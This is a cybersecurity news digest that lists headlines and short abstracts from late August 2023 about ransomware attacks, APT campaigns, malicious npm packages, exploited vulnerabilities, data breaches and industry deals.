Adversary On The Defense: ANTIBOT.PW Full Text
Abstract
The Antibot web traffic filtering service, originally a GitHub project, has evolved into a commercial platform for malicious actors, offering features like cloaking to evade analysis and prolong phishing and malware campaigns.Cyware
August 26, 2023 – Breach
Malwarebytes Announces Acquisition of Online Privacy Company Cyrus Full Text
Abstract
This strategic acquisition reinforces Malwarebytes' commitment to privacy by giving users more control over their information, no matter where or how they choose to browse and interact online.Cyware
August 26, 2023 – Criminals
Update: Prospect Medical Stolen Data Listed for Sale by Emerging Ransomware Group Full Text
Abstract
The Rhysida ransomware group claimed responsibility for a ransomware attack against Prospect Medical Holdings that forced multiple hospital closures earlier this month and continues to impact operations.Cyware
August 26, 2023 – Breach
Thousands of SSNs Leaked After Ransomware Attack on Ohio State Archive Organization Full Text
Abstract
One of the oldest historical societies in the state of Ohio was hit with a ransomware attack that leaked the sensitive information of thousands, according to a statement the organization released this week.Cyware
August 26, 2023 – Business
Cypago Raises $13 Million for GRC Automation Platform Full Text
Abstract
The new investment will allow Cypago to expand its research and development, product, and go-to-market teams, and grow its presence in the North American and European markets.Cyware
August 25, 2023 – Breach
Bankrupt Crypto Platforms FTX and BlockFi Warn Customers of Data Breach Full Text
Abstract
FTX learned that Kroll, the claims agent in the bankruptcy, experienced a cybersecurity incident that compromised non-sensitive customer data of certain claimants in the pending bankruptcy case.Cyware
August 25, 2023 – Policy and Law
Two LAPSUS$ Hackers Convicted in London Court for High-Profile Tech Firm Hacks Full Text
Abstract
Two U.K. teenagers have been convicted by a jury in London for being part of the notorious LAPSUS$ transnational gang and for orchestrating a series of brazen, high-profile hacks against major tech firms and demanding a ransom in exchange for not leaking the stolen information. This includes Arion Kurtaj (aka White, Breachbase, WhiteDoxbin, and TeaPotUberHacker), an 18-year-old from Oxford, and an unnamed minor, who began collaborating in July 2021 after having met online, BBC reported this week. Both the defendants were initially arrested and released under investigation in January 2022, only to be re-arrested and charged by the City of London Police in April 2022. Kurtaj was subsequently granted bail and moved to a hotel in Bicester after he was doxxed in an online cybercrime forum. He, however, continued his hacking spree, targeting companies like Uber , Revolut , and Rockstar Games , as a result of which he was arrested again in September. Another alleged member of theThe Hacker News
August 25, 2023
China-linked Flax Typhoon APT targets Taiwan Full Text
Abstract
China-linked APT group Flax Typhoon targeted dozens of organizations in Taiwan as part of a suspected espionage campaign. Microsoft linked the Chinese APT Flax Typhoon (aka Ethereal Panda) to a cyber espionage campaign that targeted dozens of organizations...Security Affairs
August 25, 2023 – Vulnerabilities
Cisco NX-OS Software TACACS+ or RADIUS Remote Authentication Directed Request Denial of Service Vulnerability Full Text
Abstract
This vulnerability can only be exploited over Telnet, which is disabled by default, or over the console management connection. This vulnerability cannot be exploited over SSH connections to the device.Cyware
August 25, 2023 – Education
Learn How Your Business Data Can Amplify Your AI/ML Threat Detection Capabilities Full Text
Abstract
In today's digital landscape, your business data is more than just numbers—it's a powerhouse. Imagine leveraging this data not only for profit but also for enhanced AI and Machine Learning (ML) threat detection. For companies like Comcast, this isn't a dream. It's reality. Your business comprehends its risks, vulnerabilities, and the unique environment in which it operates. No generic, one-size-fits-all tool can capture this nuance. By utilizing your own data, you position yourself ahead of potential threats, enabling informed decisions and safeguarding your assets. Join our groundbreaking webinar, " Clean Data, Better Detections: Using Your Business Data for AI/ML Detections ," to unearth how your distinct business data can be the linchpin to amplifying your AI/ML threat detection prowess. This webinar will endow you with the insights and tools necessary to harness your business data, leading to sharper, more efficient, and potent threat detections. UPCThe Hacker News
August 25, 2023 – Botnet
Whiffy Recon malware triangulates the position of infected systems via Wi-Fi Full Text
Abstract
Experts observed the SmokeLoader malware delivering a new Wi-Fi scanning malware strain dubbed Whiffy Recon. Secureworks Counter Threat Unit (CTU) researchers observed the Smoke Loader botnet dropping a new Wi-Fi scanning malware named Whiffy Recon....Security Affairs
August 25, 2023 – Ransomware
Ransomware With an Identity Crisis Targets Small Businesses, Individuals Full Text
Abstract
A key reason it was so tricky for researchers to identify TZW as a spinoff of Adhubllka is because of the small ransom demands the group typically makes. At such a level, victims often pay attackers and the attackers continue to fly under the radar.Cyware
August 25, 2023 – Education
Navigating Legacy Infrastructure: A CISO’s Actionable Strategy for Success Full Text
Abstract
Every company has some level of tech debt. Unless you're a brand new start-up, you most likely have a patchwork of solutions that have been implemented throughout the years, often under various leadership teams with different priorities and goals. As those technologies age, they can leave your organization vulnerable to cyber threats. While replacing legacy technologies can be costly, those costs may pale in comparison to a breach – both in terms of immediate financial impact and reputational damage. Here are three ways you can communicate risk to your leadership team as you work to replace legacy infrastructure. 1: Make the Risk Real Leadership teams are driven by quantifiable business implications. The best way to get support for updating or replacing legacy technology is to make the risk to the business real - and measurable - in a language they understand. One way to do this is to look at the list of critical vulnerabilities that you've identified, then evaluate the impact tThe Hacker News
August 25, 2023a – Government
FBI: Patches for Barracuda ESG Zero-Day CVE-2023-2868 are ineffective Full Text
Abstract
The FBI warned that patches for a critical Barracuda ESG flaw CVE-2023-2868 are "ineffective" and patched appliances are still being hacked. The Federal Bureau of Investigation warned that security patches for critical vulnerability CVE-2023-2868...Security Affairs
August 25, 2023 – Breach
Nearly 1,000 Organizations, 60 Million Individuals Impacted by MOVEit Hack Full Text
Abstract
On August 14 and 15, the cybercriminals leaked nearly 1 Tb of information allegedly stolen from 16 of the victims, Resecurity said. These victims include UCLA, Siemens Energy, Cognizant, and cybersecurity firms Norton LifeLock and Netscout.Cyware
August 25, 2023 – Hacker
China-Linked Flax Typhoon Cyber Espionage Targets Taiwan’s Key Sectors Full Text
Abstract
A nation-state activity group originating from China has been linked to cyber attacks on dozens of organizations in Taiwan as part of a suspected espionage campaign. The Microsoft Threat Intelligence team is tracking the activity under the name Flax Typhoon , which is also known as Ethereal Panda. "Flax Typhoon gains and maintains long-term access to Taiwanese organizations' networks with minimal use of malware, relying on tools built into the operating system, along with some normally benign software to quietly remain in these networks," the company said . It further said it hasn't observed the group weaponize the access to conduct data-collection and exfiltration. A majority of the targets include government agencies, educational institutions, critical manufacturing, and information technology organizations in Taiwan. A smaller number of victims have also been detected in Southeast Asia, North America, and Africa. The group is suspected to have been active siThe Hacker News
August 25, 2023 – Breach
Title Lender TMX Now Says Payment Card Data Stolen in Breach Full Text
Abstract
A revised data breach notification is being sent to victims stating that attackers may have also stolen their credit/debit card number, beyond the raft of personal information.Cyware
August 25, 2023 – Vulnerabilities
Urgent FBI Warning: Barracuda Email Gateways Vulnerable Despite Recent Patches Full Text
Abstract
The U.S. Federal Bureau of Investigation (FBI) is warning that Barracuda Networks Email Security Gateway (ESG) appliances patched against a recently disclosed critical flaw continue to be at risk of potential compromise from suspected Chinese hacking groups. It also deemed the fixes as "ineffective" and that it "continues to observe active intrusions and considers all affected Barracuda ESG appliances to be compromised and vulnerable to this exploit." Tracked as CVE-2023-2868 (CVSS score: 9.8), the zero-day bug is said to have been weaponized as early as October 2022, more than seven months before the security hole was plugged. Google-owned Mandiant is tracking the China-nexus activity cluster under the name UNC4841 . The remote command injection vulnerability, impacting versions 5.1.3.001 through 9.2.0.006, allows for unauthorized execution of system commands with administrator privileges on the ESG product. In the attacks observed so far, a successful bThe Hacker News
August 25, 2023 – Attack
China-based ‘Flax Typhoon’ hackers targeting Taiwan govt: Microsoft Full Text
Abstract
The activities observed suggest the threat actor intends to perform espionage and maintain access to organizations across a broad range of industries for as long as possible.Cyware
August 25, 2023 – General
Time keeps on slippin’ slippin’ slippin’: The 2023 Active Adversary Report for Tech Leaders Full Text
Abstract
In H1 2023, compromised credentials accounted for 50% of root causes, whereas exploiting a bug came in at 23%. We can’t conclusively say that attackers are favoring compromised credentials over vulnerabilities, but it can’t be denied either.Cyware
August 25, 2023 – Hacker
New Luna Grabber Poses as Roblox Packages, Strikes NPM Full Text
Abstract
Malicious actors are targeting Roblox developers with a new malware called Luna Grabber, distributed through npm packages that impersonate legitimate software. These fake packages, including noblox.js-vps, noblox.js-ssh, and noblox.js-secure, house malicious multi-stage payloads. This campaign ... Read MoreCyware
August 25, 2023 – Vulnerabilities
Researchers released PoC exploit for Ivanti Sentry flaw CVE-2023-38035 Full Text
Abstract
The vulnerability could be exploited to access sensitive API data and configurations, run system commands, or write files onto the system. The vulnerability CVE-2023-38035 impacts Sentry versions 9.18 and prior.Cyware
August 24, 2023 – Cryptocurrency
Millions stolen from crypto platforms Exactly Protocol and Harbor Protocol Full Text
Abstract
Two DeFi platforms, Exactly and Harbor, fell victim to cyberattacks resulting in the theft of millions of dollars' worth of cryptocurrency. Exactly Protocol confirmed suffering a loss of around $7.3 million worth of ETH.Cyware
August 24, 2023 – Hacker
Lazarus Group Exploits Critical Zoho ManageEngine Flaw to Deploy Stealthy QuiteRAT Malware Full Text
Abstract
The North Korea-linked threat actor known as Lazarus Group has been observed exploiting a now-patched critical security flaw impacting Zoho ManageEngine ServiceDesk Plus to distribute a remote access trojan called such as QuiteRAT . Targets include internet backbone infrastructure and healthcare entities in Europe and the U.S., cybersecurity company Cisco Talos said in a two-part analysis published today. What's more, a closer examination of the adversary's recycled attack infrastructure in its cyber assaults on enterprises has led to the discovery of a new threat dubbed CollectionRAT . The fact that the Lazarus Group continues to rely on the same tradecraft despite those components being well-documented over the years underscores the threat actor's confidence in their operations, Talos pointed out. QuiteRAT is said to be a successor to MagicRAT , itself a follow-up to TigerRAT, while CollectionRAT appears to share overlaps with EarlyRAT (aka Jupiter ), an imThe Hacker News
August 24, 2023 – Vulnerabilities
Researchers released PoC exploit for Ivanti Sentry flaw CVE-2023-38035 Full Text
Abstract
Proof-of-concept exploit code for critical Ivanti Sentry authentication bypass flaw CVE-2023-38035 has been released. Researchers released a proof-of-concept (PoC) exploit code for critical Ivanti Sentry authentication bypass vulnerability CVE-2023-38035...Security Affairs
August 24, 2023 – Malware
Smoke Loader Drops Whiffy Recon Wi-Fi Scanning and Geolocation Malware Full Text
Abstract
Whiffy Recon works by checking for the WLAN AutoConfig service (WLANSVC) on the infected system and terminating itself if the service name doesn't exist. Persistence is achieved by means of a shortcut that's added to the Windows Startup folder.Cyware
August 24, 2023 – Phishing
New Telegram Bot “Telekopye” Powering Large-scale Phishing Scams from Russia Full Text
Abstract
A new financially motivated operation is leveraging a malicious Telegram bot to help threat actors scam their victims. Dubbed Telekopye , a portmanteau of Telegram and kopye (meaning "spear" in Russian), the toolkit functions as an automated means to create a phishing web page from a premade template and send the URL to potential victims, codenamed Mammoths by the criminals. "This toolkit is implemented as a Telegram bot that, when activated, provides several easy-to-navigate menus in the form of clickable buttons that can accommodate many scammers at once," ESET researcher Radek Jizba said in a report shared with The Hacker News. The exact origins of the threat actors, dubbed Neanderthals, are unclear, but evidence points to Russia as the country of origin of the toolkit's authors and users, owing to the use of Russian SMS templates and the fact that a majority of the targeted online marketplaces are popular in the country. Multiple versions of TelekoThe Hacker News
August 24, 2023 – Attack
Lazarus APT exploits Zoho ManageEngine flaw to target an Internet backbone infrastructure provider Full Text
Abstract
The North Korea-linked Lazarus group exploits a critical flaw in Zoho ManageEngine ServiceDesk Plus to deliver the QuiteRAT malware. The North Korea-linked APT group Lazarus has been exploiting a critical vulnerability, tracked as CVE-2022-47966,...Security Affairs
August 24, 2023 – Hacker
Telekopye: Hunting Mammoths using Telegram bot Full Text
Abstract
The exact origins of the threat actors, dubbed Neanderthals, are unclear, but evidence points to Russia as the country of origin of the toolkit's authors and users, owing to the use of Russian SMS templates.Cyware
August 24, 2023 – General
The Hidden Dangers of Public Wi-Fi Full Text
Abstract
Public Wi-Fi, which has long since become the norm, poses threats to not only individual users but also businesses. With the rise of remote work, people can now work from virtually anywhere: a cafe close to home, a hotel in a different city, or even while waiting for a plane at the airport. Next, let's explore the risks of connecting to public Wi-Fi, both for you personally and for businesses. According to the Forbes Advisor the majority of people (56%) connect to public Wi-Fi networks that don't require a password. This convenience comes at a price, and many are unaware that attackers can steal card details, passwords, and other sensitive information. Man-in-the-Middle (MITM) Attacks: This is one of the most common threats on public Wi-Fi. In an MITM attack, the hacker secretly intercepts and possibly alters the communication between two parties. The user believes they are directly communicating with a website, email server, or another user, but the hacker is relaying tThe Hacker News
August 24, 2023 – Policy and Law
Lapsus$ member has been convicted of having hacked multiple high-profile companies Full Text
Abstract
An 18-year-old member of the Lapsus$ gang has been convicted of having helped hack multiple high-profile companies. A teenage member of the Lapsus$ data extortion group, Arion Kurtaj (18), was convicted by a London jury of having hacked multiple...Security Affairs
August 24, 2023 – Malware
Lazarus Group Exploits ManageEngine Vulnerability to Deploy QuiteRAT Full Text
Abstract
QuiteRAT is clearly an evolution of MagicRAT. While MagicRAT is a bigger, bulkier malware family averaging around 18MB in size, QuiteRAT is a much much smaller implementation, averaging around 4 to 5MB in size.Cyware
August 24, 2023 – Malware
New “Whiffy Recon” Malware Triangulates Infected Device Location via Wi-Fi Every Minute Full Text
Abstract
The SmokeLoader malware is being used to deliver a new Wi-Fi scanning malware strain called Whiffy Recon on compromised Windows machines. "The new malware strain has only one operation. Every 60 seconds it triangulates the infected systems' positions by scanning nearby Wi-Fi access points as a data point for Google's geolocation API," Secureworks Counter Threat Unit (CTU) said in a statement shared with The Hacker News. "The location returned by Google's Geolocation API is then sent back to the adversary." SmokeLoader , as the name implies, is a loader malware whose sole purpose is to drop additional payloads onto a host. Since 2014, the malware has been offered for sale to Russian-based threat actors. It's traditionally distributed via phishing emails. Whiffy Recon works by checking for the WLAN AutoConfig service (WLANSVC) on the infected system and terminating itself if the service name doesn't exist. It's worth noting that thThe Hacker News
August 24, 2023 – Vulnerabilities
More than 3,000 Openfire servers exposed to attacks using a new exploit Full Text
Abstract
Researchers warn that more than 3,000 unpatched Openfire servers are exposed to attacks using an exploit for a recent flaw. Vulncheck researchers discovered more than 3,000 Openfire servers vulnerable to the CVE-2023-32315 flaw that are exposed to attacks...Security Affairs
August 24, 2023
nao-sec.org Full Text
Abstract
The APT group starts by sending a spear-phishing email, which consists of a DOC file embedded with a URL for a ZIP file download. Once the ZIP file gets downloaded, it contains an EXE file and a DLL file which are executed to infect malware.Cyware
August 24, 2023 – Attack
WinRAR Security Flaw Exploited in Zero-Day Attacks to Target Traders Full Text
Abstract
A recently patched security flaw in the popular WinRAR archiving software has been exploited as a zero-day since April 2023, new findings from Group-IB reveal. The vulnerability, cataloged as CVE-2023-38831 , allows threat actors to spoof file extensions, thereby making it possible to launch malicious scripts contained within an archive that masquerades as seemingly innocuous image or text files. It was addressed in version 6.23 released on August 2, 2023, alongside CVE-2023-40477. In attacks discovered by the Singapore-based firm in July 2023, specially crafted ZIP or RAR archive files distributed via trading-related forums such as Forex Station have been used to deliver a variety of malware families such as DarkMe, GuLoader , and Remcos RAT . "After infecting devices, the cybercriminals withdraw money from broker accounts," Group-IB malware analyst Andrey Polovinkin said , adding as many as 130 traders' devices have been compromised as part of the campaign. TThe Hacker News
August 24, 2023 – Vulnerabilities
Bugs in NVIDIA Graphics Driver Leads to Memory Corruption Full Text
Abstract
An attacker could exploit these vulnerabilities from guest machines running virtualization environments to perform a guest-to-host escape, as we’ve illustrated with previous vulnerabilities in NVIDIA graphics drivers.Cyware
August 24, 2023 – Vulnerabilities
Thousands of Unpatched Openfire XMPP Servers Still Exposed to High-Severity Flaw Full Text
Abstract
Thousands of Openfire XMPP servers are unpatched against a recently disclosed high-severity flaw and are susceptible to a new exploit, according to a new report from VulnCheck. Tracked as CVE-2023-32315 (CVSS score: 7.5), the vulnerability relates to a path traversal vulnerability in Openfire's administrative console that could permit an unauthenticated attacker to access otherwise restricted pages reserved for privileged users. It affects all versions of the software released since April 2015, starting with version 3.10.0. It was remediated by its developer, Ignite Realtime, earlier this May with the release of versions 4.6.8, 4.7.5, and 4.8.0. "Path traversal protections were already in place to protect against exactly this kind of attack, but didn't defend against certain non-standard URL encoding for UTF-16 characters that were not supported by the embedded web server that was in use at the time," the maintainers said in a detailed advisory. "AThe Hacker News
August 24, 2023 – Attack
More than 3,000 Openfire servers exposed to attacks using a new exploit Full Text
Abstract
The experts pointed out that the bug has been exploited for more than two months, but yet to be added to the CISA KEV catalog. The researchers discovered approximately 6,300 servers on Shodan and a bit more using the Censys search engine.Cyware
August 24, 2023 – Policy and Law
Tornado Cash Founders Charged in Billion-Dollar Crypto Laundering Scandal Full Text
Abstract
The U.S. Justice Department (DoJ) on Wednesday unsealed an indictment against two founders of the now-sanctioned Tornado Cash cryptocurrency mixer service, charging them with laundering more than $1 billion in criminal proceeds. Both the individuals, Roman Storm and Roman Semenov, have been charged with conspiracy to commit money laundering, conspiracy to commit sanctions violations, and conspiracy to operate an unlicensed money-transmitting business. Storm, 34, is said to have been arrested in the U.S. state of Washington. Semenov, 35, remains at large in Dubai. They are alleged to have "made millions of dollars in profits" from promoting and operating the service. Tornado Cash is estimated to have processed upwards of $7 billion worth of crypto assets over a period of three years. In a related move, the U.S. Treasury Department's Office of Foreign Assets Control (OFAC) sanctioned Semenov and eight cryptocurrency addresses connected to him, days after a U.S. couThe Hacker News
August 23, 2023 – Business
Thoma Bravo Merges ForgeRock with Ping Identity Full Text
Abstract
Private equity powerhouse Thoma Bravo on Wednesday announced plans to merge the just-acquired ForgeRock with Ping Identity, combining two of the biggest names in the enterprise identity and access management market.Cyware
August 23, 2023 – Government
North Korean Affiliates Suspected in $40M Cryptocurrency Heist, FBI Warns Full Text
Abstract
The U.S. Federal Bureau of Investigation (FBI) on Tuesday warned that threat actors affiliated with North Korea may attempt to cash out stolen cryptocurrency worth more than $40 million. The law enforcement agency attributed the blockchain activity to an adversary the U.S. government tracks as TraderTraitor, which is also known by the name Jade Sleet. An investigation undertaken by the FBI found that the group moved approximately 1,580 bitcoin from several cryptocurrency heists over the past 24 hours and are currently said to be holding those funds in six different wallets. North Korea is known to blur the lines among cyber warfare, espionage, and financial crime. TraderTraitor , in particular, has been linked to a series of attacks targeting blockchain and cryptocurrency exchanges with the goal of plundering digital assets to generate illicit revenue for the sanctions-hit nation. This includes the $60 million theft of virtual currency from Alphapo on June 22, 2023; the $37 mThe Hacker News
August 23, 2023 – Policy and Law
DoJ charged Tornado Cash founders with laundering more than $1 billion Full Text
Abstract
The U.S. DoJ charged two men with operating the Tornado Cash service and laundering more than $1 Billion in criminal proceeds. The U.S. Justice Department charged two Tornado Cash founders ROMAN STORM and ROMAN SEMENOV have been charged with one count...Security Affairs
August 23, 2023 – Government
FBI Says North Korea’s Lazarus Hackers Behind Recent Crypto Heists Full Text
Abstract
June saw three headline-grabbing incidents involving cryptocurrency companies: a $100 million hack of Atomic Wallet on June 2, as well as two June 22 attacks in which cybercriminals stole $60 million from Alphapo and $37 million from CoinsPaid.Cyware
August 23, 2023 – Solution
Meta Set to Enable Default End-to-End Encryption on Messenger by Year End Full Text
Abstract
Meta has once again reaffirmed its plans to roll out support for end-to-end encryption ( E2EE ) by default for one-to-one friends and family chats on Messenger by the end of the year. As part of that effort, the social media giant said it's upgrading "millions more people's chats" effective August 22, 2023, exactly seven months after it started gradually expanding the feature to more users in January 2023. The changes are part of CEO Mark Zuckerberg's "privacy-focused vision for social networking" that was announced in 2019, although it has since encountered significant technical challenges, causing it to delay its plans by a year. "Like many messaging services, Messenger and Instagram DMs were originally designed to function via servers," Timothy Buck, product manager for Messenger, said . "Meta's servers act as the gateway between the message sender and receiver, what we call the clients." However, the addition of anThe Hacker News
August 23, 2023 – Cryptocurrency
FBI identifies wallets holding cryptocurrency funds stolen by North Korea Full Text
Abstract
The U.S. FBI warned that North Korea-linked threat actors may attempt to cash out stolen cryptocurrency worth more than $40 million. The Federal Bureau of Investigation shared details about the activity of six cryptocurrency wallets operated by North...Security Affairs
August 23, 2023 – Vulnerabilities
3,000 Openfire Servers Exposed to Attacks Targeting Recent Vulnerability Full Text
Abstract
Tracked as CVE-2023-32315, the high-severity flaw was discovered in Openfire’s administration console and is described as a path traversal bug via the setup environment that allows unauthenticated attackers to access restricted pages.Cyware
August 23, 2023 – Hacker
Agile Approach to Mass Cloud Credential Harvesting and Crypto Mining Sprints Ahead Full Text
Abstract
Developers are not the only people who have adopted the agile methodology for their development processes. From 2023-06-15 to 2023-07-11, Permiso Security's p0 Labs team identified and tracked an attacker developing and deploying eight (8) incremental iterations of their credential harvesting malware while continuing to develop infrastructure for an upcoming (spoiler: now launched) campaign targeting various cloud services. While last week Aqua Security published a blog detailing this under-development campaign's stages related to infected Docker images, today Permiso p0 Labs and SentinelLabs are releasing joint research highlighting the incremental updates to the cloud credential harvesting malware samples systematically collected by monitoring the attacker's infrastructure. So get out of your seats and enjoy this scrum meeting stand-up dedicated to sharing knowledge about this actors campaign and the tooling they will use to steal more cloud credentials. If you like IDA screeThe Hacker News
August 23, 2023
Carderbee APT targets Hong Kong orgs via supply chain attacks Full Text
Abstract
A previously unknown APT group, tracked as Carderbee, was behind a supply chain attack against Hong Kong organizations. Symantec Threat Hunter Team reported that a previously unknown APT group, tracked as Carderbee, used a malware-laced version of the legitimate...Security Affairs
August 23, 2023 – Breach
University of Minnesota Investigates Alleged Data Breach Involving Seven Million Alumni Full Text
Abstract
The University of Minnesota has contacted law enforcement and launched an investigation into a data breach that could impact millions of alumni. A hacker claimed to have collected 7 million Social Security numbers in July.Cyware
August 23, 2023 – Hacker
Syrian Threat Actor EVLF Unmasked as Creator of CypherRAT and CraxsRAT Android Malware Full Text
Abstract
A Syrian threat actor named EVLF has been outed as the creator of malware families CypherRAT and CraxsRAT. "These RATs are designed to allow an attacker to remotely perform real-time actions and control the victim device's camera, location, and microphone," Cybersecurity firm Cyfirma said in a report published last week. CypherRAT and CraxsRAT are said to be offered to other cybercriminals as part of a malware-as-a-service (MaaS) scheme. As many as 100 unique threat actors are estimated to have purchased the twin tools on a lifetime license over the past three years. EVLF is said to be operating a web shop to advertise their warez since at least September 2022. CraxsRAT is billed as an Android trojan that enables a threat actor to remote control an infected device from a Windows computer, with the developer consistently releasing new updates based on feedback from the customers. The malicious package is generated using a builder, which comes with options to cusThe Hacker News
August 23, 2023 – Vulnerabilities
TP-Link Tapo L530E smart bulb flaws allow hackers to steal user passwords Full Text
Abstract
Four vulnerabilities in the TP-Link Tapo L530E smart bulb and impacting the mobile app used to control them expose users to hack. Researchers from the University of Catania (Italy) and the University of London (UK) have discovered four vulnerabilities...Security Affairs
August 23, 2023 – Government
CISA Prioritizing On-Site K-12 Cybersecurity Reviews This School Year Full Text
Abstract
The assessments can encompass a wide range of individualized reviews and actions, from preventing cyber-enabled fraud schemes to combating ransomware attacks and other digital intrusions.Cyware
August 23, 2023 – Ransomware
Spacecolon Toolset Fuels Global Surge in Scarab Ransomware Attacks Full Text
Abstract
A malicious toolset dubbed Spacecolon is being deployed as part of an ongoing campaign to spread variants of the Scarab ransomware across victim organizations globally. "It probably finds its way into victim organizations by its operators compromising vulnerable web servers or via brute forcing RDP credentials," ESET security researcher Jakub Souček said in a detailed technical write-up published Tuesday. The Slovak cybersecurity firm, which dubbed the threat actor CosmicBeetle, said the origins of the Spacecolon date back to May 2020. The highest concentration of victims has been detected in France, Mexico, Poland, Slovakia, Spain, and Turkey. While the exact provenance of the adversary is unclear, several Spacecolon variants are said to contain Turkish strings, likely pointing to the involvement of a Turkish-speaking developer. There is no evidence currently linking it to any other known threat actor group. Some of the targets include a hospital and a tourist resoThe Hacker News
August 23, 2023 – Vulnerabilities
First Weekly Chrome Security Update Patches High-Severity Vulnerabilities Full Text
Abstract
Google this week announced a Chrome 116 security update that patches five memory safety vulnerabilities reported by external researchers, including four issues rated ‘high severity’.Cyware
August 23, 2023 – Malware
Over a Dozen Malicious npm Packages Target Roblox Game Developers Full Text
Abstract
More than a dozen malicious packages have been discovered on the npm package repository since the start of August 2023 with capabilities to deploy an open-source information stealer called Luna Token Grabber on systems belonging to Roblox developers. The ongoing campaign, first detected on August 1 by ReversingLabs, employs modules that masquerade as the legitimate package noblox.js , an API wrapper that's used to create scripts that interact with the Roblox gaming platform. The software supply chain security company described the activity as a "replay of an attack uncovered two years ago" in October 2021. "The malicious packages [...] reproduce code from the legitimate noblox.js package but add malicious, information-stealing functions," software threat researcher Lucija Valentić said in a Tuesday analysis. The packages were cumulatively downloaded 963 times before they were taken down. The names of the rogue packages are as follows - noblox.js-vThe Hacker News
August 23, 2023 – Ransomware
Report: Ransomware Attackers’ Dwell Time Shrinks Full Text
Abstract
Ransomware-wielding hackers are moving faster than ever to pull the trigger on malicious encryption - but they could be bumping up against the limits of how fast they can go, said security researchers from Sophos.Cyware
August 23, 2023 – Attack
Ransomware Intrusion Impacts All Servers of Danish Cloud Provider Full Text
Abstract
The attack occurred on August 18, and since then, efforts have been made to restore the data, but it has proved difficult. CloudNordic has stated that it will not pay the ransom demanded by the hackers.Cyware
August 23, 2023
Supply Chain Attack: Carderbee APT Strikes Hong Kong Organizations Full Text
Abstract
Undocumented threat cluster Carderbee was observed targeting organizations in Hong Kong and other Asian regions via a trojanized version of the legitimate software EsafeNet Cobra DocGuard Client to deliver the PlugX backdoor and gain access to victim networks. Strengthening supply chain security th ... Read MoreCyware
August 23, 2023 – Breach
Defense Contractor Belcan Leaks Admin Password With a List of Flaws Full Text
Abstract
On May 15th, the Cybernews research team discovered an open Kibana instance containing sensitive information regarding Belcan, their employees, and internal infrastructure.Cyware
August 22, 2023 – Criminals
MOVEit Attack Spree Makes Clop This Summer’s Most-Prolific Ransomware Group Full Text
Abstract
Clop was responsible for one-third of all ransomware attacks in July, positioning the financially-motivated threat actor to become the most prolific ransomware threat actor this summer, according to multiple threat intelligence reports.Cyware
August 22, 2023 – General
CISOs Tout SaaS Cybersecurity Confidence, But 79% Admit to SaaS Incidents, New Report Finds Full Text
Abstract
A new State of SaaS Security Posture Management Report from SaaS cybersecurity provider AppOmni indicates that Cybersecurity, IT, and business leaders alike recognize SaaS cybersecurity as an increasingly important part of the cyber threat landscape. And at first glance, respondents appear generally optimistic about their SaaS cybersecurity. Over 600 IT, cybersecurity, and business leaders at companies between 500-2,500+ employees were surveyed and responded with confidence in their SaaS cybersecurity preparedness and capabilities. For example: When asked to rate the SaaS cybersecurity maturity level of their organizations, 71% noted that their organizations' SaaS cybersecurity maturity has achieved either a mid-high level (43%) or the highest level (28%). For the security levels of the SaaS applications authorized for use in their organization, sentiment was similarly high. Seventy-three percent rated SaaS application security as mid-high (41%) or the highest maturity level (The Hacker News
August 22, 2023 – Breach
Defense contractor Belcan leaks admin password with a list of flaws Full Text
Abstract
US Government and defense contractor Belcan left its super admin credentials open to the public, Cybernews research team reveals. Belcan is a government, defense, and aerospace contractor offering global design, software, manufacturing, supply chain,...Security Affairs
August 22, 2023 – Malware
Thousands of Android Malware Apps Use Stealthy APKs to Bypass Security Full Text
Abstract
Threat actors are reportedly exploiting APK files that employ unknown or unsupported compression methods to bypass malware analysis, warned cybersecurity firm Zimperium. The approach hinders decompilation efforts while still enabling installation on Android devices running OS versions above Android ... Read MoreCyware
August 22, 2023 – Attack
Carderbee Attacks: Hong Kong Organizations Targeted via Malicious Software Updates Full Text
Abstract
A previously undocumented threat cluster has been linked to a software supply chain attack targeting organizations primarily located in Hong Kong and other regions in Asia. The Symantec Threat Hunter Team, part of Broadcom, is tracking the activity under its insect-themed moniker Carderbee. The attacks, per the cybersecurity firm, leverage a trojanized version of a legitimate software called EsafeNet Cobra DocGuard Client to deliver a known backdoor called PlugX (aka Korplug) on victim networks. "In the course of this attack, the attackers used malware signed with a legitimate Microsoft certificate," the company said in a report shared with The Hacker News. The use of Cobra DocGuard Client to pull off a supply chain attack was previously highlighted by ESET in its quarterly Threat Report this year, detailing a September 2022 intrusion in which an unnamed gambling company in Hong Kong was compromised via a malicious update pushed by the software. The same companyThe Hacker News
August 22, 2023 – Criminals
Akira ransomware gang spotted targeting Cisco VPN products to hack organizations Full Text
Abstract
The Akira ransomware gang targets Cisco VPN products to gain initial access to corporate networks and steal their data. The Akira ransomware has been active since March 2023, the threat actors behind the malware claim to have already hacked multiple...Security Affairs
August 22, 2023 – Hacker
EVLF DEV - Knowing the Creator of CypherRAT and CraxsRAT Full Text
Abstract
A fresh player in the realm of cyber threats has emerged under the moniker EVLF DEV, operating as a Malware-as-a-Service (MaaS) provider. Hailing from Syria and active for over eight years, this actor has developed the CypherRAT and CraxsRAT malware strains. To counteract such campaigns by maliciou ... Read MoreCyware
August 22, 2023 – Malware
New Variant of XLoader macOS Malware Disguised as ‘OfficeNote’ Productivity App Full Text
Abstract
A new variant of an Apple macOS malware called XLoader has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called "OfficeNote." "The new version of XLoader is bundled inside a standard Apple disk image with the name OfficeNote.dmg," SentinelOne security researchers Dinesh Devadoss and Phil Stokes said in a Monday analysis. "The application contained within is signed with the developer signature MAIT JAKHU (54YDV8NU9C)." XLoader , first detected in 2020, is considered a successor to Formbook and is an information stealer and keylogger offered under the malware-as-a-service (MaaS) model. A macOS variant of the malware emerged in July 2021, distributed as a Java program in the form of a compiled .JAR file. "Such files require the Java Runtime Environment, and for that reason the malicious .jar file will not execute on a macOS install out of the box, since Apple stopped shipping JRE withThe Hacker News
August 22, 2023 – Criminals
Snatch gang claims the hack of the Department of Defence South Africa Full Text
Abstract
Snatch gang claims the hack of the Department of Defence South Africa and added the military organization to its leak site. The Snatch ransomware group added the Department of Defence South Africa to its data leak site. The mission of the Department...Security Affairs
August 22, 2023 – Breach
Two Data Breaches in Gadsden: Court System, EMS Report That Data May Have Been Stolen Full Text
Abstract
The 2nd Judicial Circuit announced Monday that law enforcement is investigating a data breach involving Gadsden County court records. In a news release, the circuit said that initial assessments show some of the records contained PII.Cyware
August 22, 2023 – Vulnerabilities
Ivanti Warns of Critical Zero-Day Flaw Being Actively Exploited in Sentry Software Full Text
Abstract
